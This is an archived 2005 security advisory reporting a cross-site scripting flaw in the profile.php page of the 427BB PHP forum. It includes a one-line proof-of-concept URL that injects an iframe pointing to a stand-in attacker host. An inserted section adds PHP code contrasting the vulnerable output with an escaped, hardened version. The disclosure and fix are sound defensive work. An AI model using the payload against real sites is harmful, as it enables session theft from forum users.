HRG007.txt

2005-03-03T00:00:00
ID PACKETSTORM:36409
Type packetstorm
Reporter Raven
Modified 2005-03-03T00:00:00

Description

                                        
                                            `  
  
[][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]
[]
[] HRG - Hackerlounge Research Group
[] Release: HRG007
[] Monday 03/01/05
[] 427BB
[]
[] The author can't be held responsible for any damage
[] done by a reader. You have your own responsibility.
[] Please use this document like it's meant to.
[]
[][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]
  
Vulnerable: 427BB (Any Version)   
  
  
---   
  
General Information:   
  
427BB is a simple board, and I have no idea why I'm
releasing this because it's very unpopular, but I said
what the hell. It's based on PHP and MySQL.
  
---   
  
Description:   
  
In profile.php the user variable is vulnerable to an
XSS attack by a remote attacker. The user string isn't
filtered of <, > or ". This makes it very easy for an
attacker to steal a session and do many other things.
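
The page does not show the source of profile.php, so the following is an added example, not 427BB's own code: a hypothetical reconstruction of the unfiltered-output pattern the advisory describes, beside the hardened form that escapes <, >, " and ' on output with htmlspecialchars(). The function names and the input array are assumptions.

```php
<?php
// Added example (not 427BB's source). The advisory only says that the
// "user" string reaches the page unfiltered; this reconstructs that pattern.

// BEFORE (vulnerable pattern): the "user" query parameter is concatenated
// straight into HTML, so <, > and " from the URL become live markup.
function render_profile_vulnerable(array $get): string
{
    $user = (string)($get['user'] ?? '');
    return '<h1>Profile of ' . $user . '</h1>'
         . '<input type="text" name="user" value="' . $user . '">';
}

// AFTER (hardened): escape on output. ENT_QUOTES also covers single quotes,
// so the same value is safe in element content and in attribute values;
// ENT_SUBSTITUTE keeps invalid UTF-8 from silently producing an empty string.
function render_profile_safe(array $get): string
{
    $user = htmlspecialchars(
        (string)($get['user'] ?? ''),
        ENT_QUOTES | ENT_SUBSTITUTE,
        'UTF-8'
    );
    return '<h1>Profile of ' . $user . '</h1>'
         . '<input type="text" name="user" value="' . $user . '">';
}

// Self-check with the advisory's own payload, as PHP would URL-decode it
// into $_GET (constructed sample input).
$sample = ['user' => '<iframe src=http://www.evilhost.com height=1 width=1></iframe>'];

$vuln = render_profile_vulnerable($sample);
$safe = render_profile_safe($sample);

// The vulnerable output still contains a real <iframe> tag.
if (strpos($vuln, '<iframe') === false) {
    throw new RuntimeException('expected raw markup in vulnerable output');
}
// The hardened output contains only the entity-encoded text &lt;iframe ...
if (strpos($safe, '<iframe') !== false || strpos($safe, '&lt;iframe') === false) {
    throw new RuntimeException('escaping failed');
}
echo $safe, PHP_EOL;
```

The same rule applies anywhere else the board echoes request data: escape at the point of output for the context it lands in, rather than trying to strip characters on input.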
  
---   
  
PoC Code:

Place the following code into the URL, then reload
the profile page and it will execute this code.
  
profile.php?user=%3Ciframe%20src=http://www.evilhost.com%20height=1%20width=1%3E%3C/iframe%3E   
  
This is very unsafe and vulnerable because you can
execute any code you would like, which can lead to
major damage to the forum you are attacking.
  
---   
  
Fix and Vendor status:   
  
Vendor has been notified, expect official patch soon.   
  
---   
  
Greetz:   
  
All the people at hackerlounge.com, JWT,   
TGS-Security.com and JWT-Security.net.   
Specifically:   
  
Th3_R@v3n (me), Dlab, Riddick, Enjoi, Blademaster,   
Modzilla, Pingu, Jake Johnson, Afterburn, airo,   
cardiaC, chis, ComputerGeek, deep_phreeze, dudley,   
evasion, eXtacy, Mattewan, Afterburn,   
Thanatos_Starfire, Roz, Sirross, UmInAsHoE, Infinite,   
Slarty, NoUse, Snake (I hate you), Surreal (I hate   
you), -=Vanguard=-, The_IRS, puNKiey, driedice,   
Carnuss, oKiDaN, Mr.Mind, dementis, net-RIDER,   
voteforpedro, Cryptic_Override, kodaxx,   
~CreEpy~NoDquE~, Brainscan, the_exode,   
phillysteak12345, DerrtyJake, =>HeX<=, m0rk, and   
anyone else I forgot.   
  
  
---   
  
Credit:   
  
HRG - Hackerlounge Research Group   
http://www.Hackerlounge.com   
  
Partial credit is also given to   
lancastertechnologies.org, founded by JWT.   
  
  